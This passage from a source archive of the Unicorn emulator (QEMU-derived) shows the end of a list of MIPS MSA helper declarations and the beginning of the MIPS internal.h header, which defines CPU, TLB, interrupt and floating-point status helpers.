i32, i32) DEF_HELPER_4(msa_adds_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_adds_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_addv_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hadd_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ave_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_aver_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ceq_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_cle_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_clt_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_div_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_max_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_a_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_min_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_mod_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_asub_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_hsub_u_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvev_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvod_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_ilvr_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_and_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_nor_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_or_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_xor_v, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckev_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_pckod_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_sll_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_sra_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srar_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srl_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_srlr_d, void, env, i32, i32, i32) DEF_HELPER_3(msa_move_v, void, env, i32, i32) DEF_HELPER_4(msa_andi_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_ori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_nori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_xori_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmnzi_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bmzi_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_bseli_b, void, env, i32, i32, i32) DEF_HELPER_5(msa_shf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_addvi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_subvi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_maxi_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_maxi_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_mini_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_mini_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_ceqi_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clti_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clti_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clei_s_df, void, env, i32, i32, i32, s32) DEF_HELPER_5(msa_clei_u_df, void, env, i32, i32, i32, s32) DEF_HELPER_4(msa_ldi_df, void, env, i32, i32, s32) DEF_HELPER_5(msa_slli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srai_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bclri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bseti_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_bnegi_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsli_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sat_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sat_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srari_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_srlri_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsl_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_binsr_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subs_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subs_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subsus_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_subsuu_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mulv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_maddv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msubv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dotp_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dotp_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpadd_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpadd_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpsub_s_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_dpsub_u_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sld_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_splat_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_vshf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_sldi_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_splati_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_insve_df, void, env, i32, i32, i32, i32) DEF_HELPER_3(msa_ctcmsa, void, env, tl, i32) DEF_HELPER_2(msa_cfcmsa, tl, env, i32) DEF_HELPER_5(msa_fcaf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcun_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fceq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcueq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fclt_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcult_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcle_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcule_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsaf_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsun_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fseq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsueq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fslt_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsult_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsle_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsule_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fadd_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsub_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmul_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fdiv_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmadd_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmsub_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fexp2_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fexdo_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_ftq_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmin_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmin_a_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmax_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fmax_a_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcor_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcune_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fcne_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mul_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_madd_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msub_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsor_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsune_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_fsne_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_mulr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_maddr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_5(msa_msubr_q_df, void, env, i32, i32, i32, i32) DEF_HELPER_4(msa_fill_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_s_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_copy_u_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_b, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_h, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_w, void, env, i32, i32, i32) DEF_HELPER_4(msa_insert_d, void, env, i32, i32, i32) DEF_HELPER_4(msa_fclass_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftrunc_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftrunc_u_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fsqrt_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frsqrt_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frcp_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_frint_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_flog2_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fexupl_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_fexupr_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffql_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffqr_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftint_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ftint_u_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffint_s_df, void, env, i32, i32, i32) DEF_HELPER_4(msa_ffint_u_df, void, env, i32, i32, i32) #define MSALDST_PROTO(type) \ DEF_HELPER_3(msa_ld_ ## type, void, env, i32, tl) \ DEF_HELPER_3(msa_st_ ## type, void, env, i32, tl) MSALDST_PROTO(b) MSALDST_PROTO(h) MSALDST_PROTO(w) MSALDST_PROTO(d) #undef MSALDST_PROTO DEF_HELPER_3(cache, void, env, tl, i32) ���������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/internal.h�����������������������������������������������������������0000664�0000000�0000000�00000034533�14675241067�0020406�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS internal definitions and helpers * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef MIPS_INTERNAL_H #define MIPS_INTERNAL_H #include "fpu/softfloat-helpers.h" #include "cpu.h" struct uc_struct; /* * MMU types, the first four entries have the same layout as the * CP0C0_MT field. */ enum mips_mmu_types { MMU_TYPE_NONE, MMU_TYPE_R4000, MMU_TYPE_RESERVED, MMU_TYPE_FMT, MMU_TYPE_R3000, MMU_TYPE_R6000, MMU_TYPE_R8000 }; struct mips_def_t { const char *name; int32_t CP0_PRid; int32_t CP0_Config0; int32_t CP0_Config1; int32_t CP0_Config2; int32_t CP0_Config3; int32_t CP0_Config4; int32_t CP0_Config4_rw_bitmask; int32_t CP0_Config5; int32_t CP0_Config5_rw_bitmask; int32_t CP0_Config6; int32_t CP0_Config7; target_ulong CP0_LLAddr_rw_bitmask; int CP0_LLAddr_shift; int32_t SYNCI_Step; int32_t CCRes; int32_t CP0_Status_rw_bitmask; int32_t CP0_TCStatus_rw_bitmask; int32_t CP0_SRSCtl; int32_t CP1_fcr0; int32_t CP1_fcr31_rw_bitmask; int32_t CP1_fcr31; int32_t MSAIR; int32_t SEGBITS; int32_t PABITS; int32_t CP0_SRSConf0_rw_bitmask; int32_t CP0_SRSConf0; int32_t CP0_SRSConf1_rw_bitmask; int32_t CP0_SRSConf1; int32_t CP0_SRSConf2_rw_bitmask; int32_t CP0_SRSConf2; int32_t CP0_SRSConf3_rw_bitmask; int32_t CP0_SRSConf3; int32_t CP0_SRSConf4_rw_bitmask; int32_t CP0_SRSConf4; int32_t CP0_PageGrain_rw_bitmask; int32_t CP0_PageGrain; target_ulong CP0_EBaseWG_rw_bitmask; uint64_t insn_flags; enum mips_mmu_types mmu_type; int32_t SAARP; }; extern const struct mips_def_t mips_defs[]; extern const int mips_defs_number; enum CPUMIPSMSADataFormat { DF_BYTE = 0, DF_HALF, DF_WORD, DF_DOUBLE }; void mips_cpu_do_interrupt(CPUState *cpu); bool mips_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr mips_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void mips_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); typedef struct r4k_tlb_t r4k_tlb_t; struct r4k_tlb_t { target_ulong VPN; uint32_t PageMask; uint16_t ASID; uint32_t MMID; unsigned int G:1; unsigned int C0:3; unsigned int C1:3; unsigned int V0:1; unsigned int V1:1; unsigned int D0:1; unsigned int D1:1; unsigned int XI0:1; unsigned int XI1:1; unsigned int RI0:1; unsigned int RI1:1; unsigned int EHINV:1; uint64_t PFN[2]; }; struct CPUMIPSTLBContext { uint32_t nb_tlb; uint32_t tlb_in_use; int (*map_address)(struct CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); void (*helper_tlbwi)(struct CPUMIPSState *env); void (*helper_tlbwr)(struct CPUMIPSState *env); void (*helper_tlbp)(struct CPUMIPSState *env); void (*helper_tlbr)(struct CPUMIPSState *env); void (*helper_tlbinv)(struct CPUMIPSState *env); void (*helper_tlbinvf)(struct CPUMIPSState *env); union { struct { r4k_tlb_t tlb[MIPS_TLB_MAX]; } r4k; } mmu; }; int no_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); int fixed_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); int r4k_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type); void r4k_helper_tlbwi(CPUMIPSState *env); void r4k_helper_tlbwr(CPUMIPSState *env); void r4k_helper_tlbp(CPUMIPSState *env); void r4k_helper_tlbr(CPUMIPSState *env); void r4k_helper_tlbinv(CPUMIPSState *env); void r4k_helper_tlbinvf(CPUMIPSState *env); void r4k_invalidate_tlb(CPUMIPSState *env, int idx, int use_extra); void mips_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw); #define cpu_signal_handler cpu_mips_signal_handler static inline bool cpu_mips_hw_interrupts_enabled(CPUMIPSState *env) { return (env->CP0_Status & (1 << CP0St_IE)) && !(env->CP0_Status & (1 << CP0St_EXL)) && !(env->CP0_Status & (1 << CP0St_ERL)) && !(env->hflags & MIPS_HFLAG_DM) && /* * Note that the TCStatus IXMT field is initialized to zero, * and only MT capable cores can set it to one. So we don't * need to check for MT capabilities here. */ !(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)); } /* Check if there is pending and not masked out interrupt */ static inline bool cpu_mips_hw_interrupts_pending(CPUMIPSState *env) { int32_t pending; int32_t status; bool r; pending = env->CP0_Cause & CP0Ca_IP_mask; status = env->CP0_Status & CP0Ca_IP_mask; if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { /* * A MIPS configured with a vectorizing external interrupt controller * will feed a vector into the Cause pending lines. The core treats * the status lines as a vector level, not as indiviual masks. */ r = pending > status; } else { /* * A MIPS configured with compatibility or VInt (Vectored Interrupts) * treats the pending lines as individual interrupt lines, the status * lines are individual masks. */ r = (pending & status) != 0; } return r; } void mips_tcg_init(struct uc_struct *uc); /* TODO QOM'ify CPU reset and remove */ void cpu_state_reset(CPUMIPSState *s); void cpu_mips_realize_env(CPUMIPSState *env); /* cp0_timer.c */ uint32_t cpu_mips_get_random(CPUMIPSState *env); uint32_t cpu_mips_get_count(CPUMIPSState *env); void cpu_mips_store_count(CPUMIPSState *env, uint32_t value); void cpu_mips_store_compare(CPUMIPSState *env, uint32_t value); void cpu_mips_start_count(CPUMIPSState *env); void cpu_mips_stop_count(CPUMIPSState *env); /* helper.c */ bool mips_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); /* op_helper.c */ uint32_t float_class_s(uint32_t arg, float_status *fst); uint64_t float_class_d(uint64_t arg, float_status *fst); extern unsigned int ieee_rm[]; int ieee_ex_to_mips(int xcpt); void update_pagemask(CPUMIPSState *env, target_ulong arg1, int32_t *pagemask); static inline void restore_rounding_mode(CPUMIPSState *env) { set_float_rounding_mode(ieee_rm[env->active_fpu.fcr31 & 3], &env->active_fpu.fp_status); } static inline void restore_flush_mode(CPUMIPSState *env) { set_flush_to_zero((env->active_fpu.fcr31 & (1 << FCR31_FS)) != 0, &env->active_fpu.fp_status); } static inline void restore_snan_bit_mode(CPUMIPSState *env) { set_snan_bit_is_one((env->active_fpu.fcr31 & (1 << FCR31_NAN2008)) == 0, &env->active_fpu.fp_status); } static inline void restore_fp_status(CPUMIPSState *env) { restore_rounding_mode(env); restore_flush_mode(env); restore_snan_bit_mode(env); } static inline void restore_msa_fp_status(CPUMIPSState *env) { float_status *status = &env->active_tc.msa_fp_status; int rounding_mode = (env->active_tc.msacsr & MSACSR_RM_MASK) >> MSACSR_RM; bool flush_to_zero = (env->active_tc.msacsr & MSACSR_FS_MASK) != 0; set_float_rounding_mode(ieee_rm[rounding_mode], status); set_flush_to_zero(flush_to_zero, status); set_flush_inputs_to_zero(flush_to_zero, status); } static inline void restore_pamask(CPUMIPSState *env) { if (env->hflags & MIPS_HFLAG_ELPA) { env->PAMask = (1ULL << env->PABITS) - 1; } else { env->PAMask = PAMASK_BASE; } } static inline int mips_vpe_active(CPUMIPSState *env) { int active = 1; /* Check that the VPE is enabled. */ if (!(env->mvp->CP0_MVPControl & (1 << CP0MVPCo_EVP))) { active = 0; } /* Check that the VPE is activated. */ if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA))) { active = 0; } /* * Now verify that there are active thread contexts in the VPE. * * This assumes the CPU model will internally reschedule threads * if the active one goes to sleep. If there are no threads available * the active one will be in a sleeping state, and we can turn off * the entire VPE. */ if (!(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_A))) { /* TC is not activated. */ active = 0; } if (env->active_tc.CP0_TCHalt & 1) { /* TC is in halt state. */ active = 0; } return active; } static inline int mips_vp_active(CPUMIPSState *env, CPUState *cpu) { /* Check if the VP disabled other VPs (which means the VP is enabled) */ if ((env->CP0_VPControl >> CP0VPCtl_DIS) & 1) { return 1; } /* Check if the virtual processor is disabled due to a DVP */ MIPSCPU *cs = MIPS_CPU(cpu); if ((&cs->env != env) && ((cs->env.CP0_VPControl >> CP0VPCtl_DIS) & 1)) { return 0; } return 1; } static inline void compute_hflags(CPUMIPSState *env) { env->hflags &= ~(MIPS_HFLAG_COP1X | MIPS_HFLAG_64 | MIPS_HFLAG_CP0 | MIPS_HFLAG_F64 | MIPS_HFLAG_FPU | MIPS_HFLAG_KSU | MIPS_HFLAG_AWRAP | MIPS_HFLAG_DSP | MIPS_HFLAG_DSP_R2 | MIPS_HFLAG_DSP_R3 | MIPS_HFLAG_SBRI | MIPS_HFLAG_MSA | MIPS_HFLAG_FRE | MIPS_HFLAG_ELPA | MIPS_HFLAG_ERL); if (env->CP0_Status & (1 << CP0St_ERL)) { env->hflags |= MIPS_HFLAG_ERL; } if (!(env->CP0_Status & (1 << CP0St_EXL)) && !(env->CP0_Status & (1 << CP0St_ERL)) && !(env->hflags & MIPS_HFLAG_DM)) { env->hflags |= (env->CP0_Status >> CP0St_KSU) & MIPS_HFLAG_KSU; } #if defined(TARGET_MIPS64) if ((env->insn_flags & ISA_MIPS3) && (((env->hflags & MIPS_HFLAG_KSU) != MIPS_HFLAG_UM) || (env->CP0_Status & (1 << CP0St_PX)) || (env->CP0_Status & (1 << CP0St_UX)))) { env->hflags |= MIPS_HFLAG_64; } if (!(env->insn_flags & ISA_MIPS3)) { env->hflags |= MIPS_HFLAG_AWRAP; } else if (((env->hflags & MIPS_HFLAG_KSU) == MIPS_HFLAG_UM) && !(env->CP0_Status & (1 << CP0St_UX))) { env->hflags |= 